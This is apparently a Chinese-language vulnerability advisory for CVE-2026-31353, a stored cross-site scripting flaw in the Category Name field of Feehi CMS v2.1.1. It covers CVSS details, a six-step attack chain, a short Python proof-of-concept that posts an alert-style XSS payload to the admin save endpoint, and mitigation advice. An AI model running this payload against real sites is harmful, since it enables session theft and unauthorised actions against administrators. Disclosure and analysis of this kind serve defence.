CVE-2026-31353 CVSS 5.4 中危

CVE-2026-31353 Feehi CMS存储型XSS漏洞

披露日期: 2026-04-06

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-31353

漏洞类型

跨站脚本

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Feehi CMS

漏洞概述

Feehi CMS v2.1.1版本中存在一个经过身份验证的存储型跨站脚本（XSS）漏洞。该漏洞具体位于Category模块，由于系统缺乏对用户输入的适当过滤，攻击者可在登录后台后向Name参数注入恶意HTML或JavaScript代码。一旦注入成功，当管理员或其他用户访问受影响的分类页面时，恶意脚本将在其浏览器上下文中自动执行。此类漏洞可能导致攻击者窃取用户会话凭证、进行钓鱼攻击或执行未授权操作。

技术细节

该漏洞属于存储型跨站脚本攻击（Stored XSS）。在Feehi CMS的Category模块中，系统未对用户提交的“Name”参数进行严格的输入验证和输出编码。攻击者首先需要以低权限用户身份登录系统（PR:L），随后在创建或编辑分类时，在名称字段中注入恶意的JavaScript载荷（例如`<script>alert(document.cookie)</script>`）。由于系统直接存储该载荷并在后续页面渲染时原样输出，未进行HTML实体转义，任何访问该分类页面的用户（包括管理员）的浏览器都会解析并执行该恶意代码。根据CVSS向量，该漏洞利用复杂度低（AC:L），且具有跨上下文影响（S:C），攻击者可利用此漏洞窃取用户凭证、执行未授权操作或进行钓鱼攻击，对系统安全性构成严重威胁。

攻击链分析

STEP 1

步骤1：信息收集

攻击者识别目标系统为Feehi CMS v2.1.1，并确认Category模块的存在。

STEP 2

步骤2：获取凭证

攻击者注册或获取一个低权限账户（满足PR:L要求），登录后台管理系统。

STEP 3

步骤3：注入载荷

攻击者在Category模块的“Name”参数中输入精心构造的XSS Payload，并保存。

STEP 4

步骤4：存储载荷

由于缺乏过滤，恶意脚本被存储在数据库中。

STEP 5

步骤5：触发漏洞

当管理员或具有更高权限的用户查看分类列表页面时，浏览器解析并执行恶意脚本。

STEP 6

步骤6：执行攻击

脚本执行，窃取Cookie、Session ID或执行浏览器端的恶意操作。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL (Feehi CMS Category Module)
target_url = "http://example.com/admin/category/save"

# Attacker's session cookie (Required as per PR:L)
session_cookie = {
    "PHPSESSID": "attacker_session_id_here"
}

# Malicious payload injected into the Name parameter
xss_payload = "<img src=x onerror=alert('XSS-CVE-2026-31353')>"

# Data payload to be sent in the POST request
post_data = {
    "Name": xss_payload,
    "ParentId": "0",
    "slug": "test-category"
}

try:
    # Send the POST request to inject the payload
    response = requests.post(target_url, data=post_data, cookies=session_cookie)

    if response.status_code == 200:
        print("[+] Payload injected successfully into the Category Name parameter.")
        print("[+] Trigger the payload by visiting the category list page.")
    else:
        print("[-] Failed to inject payload. Status code:", response.status_code)

except Exception as e:
    print("[-] An error occurred:", str(e))

影响范围

Feehi CMS v2.1.1

防御指南

临时缓解措施

建议管理员暂时限制低权限用户对Category模块的创建和编辑权限，或在服务器端部署WAF规则以拦截包含恶意脚本特征的请求。同时，应对已存储的数据进行审查和清洗，清除可能存在的恶意代码。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-31353
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-31353
3 Details https://www.cvedetails.com/cve/CVE-2026-31353/
4 VulDB https://vuldb.com/cve/CVE-2026-31353
5 Link https://github.com/liufee/cms
6 Link https://github.com/liufee/cms/issues/84
7 Link https://github.com/liufee/cms/issues/84

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表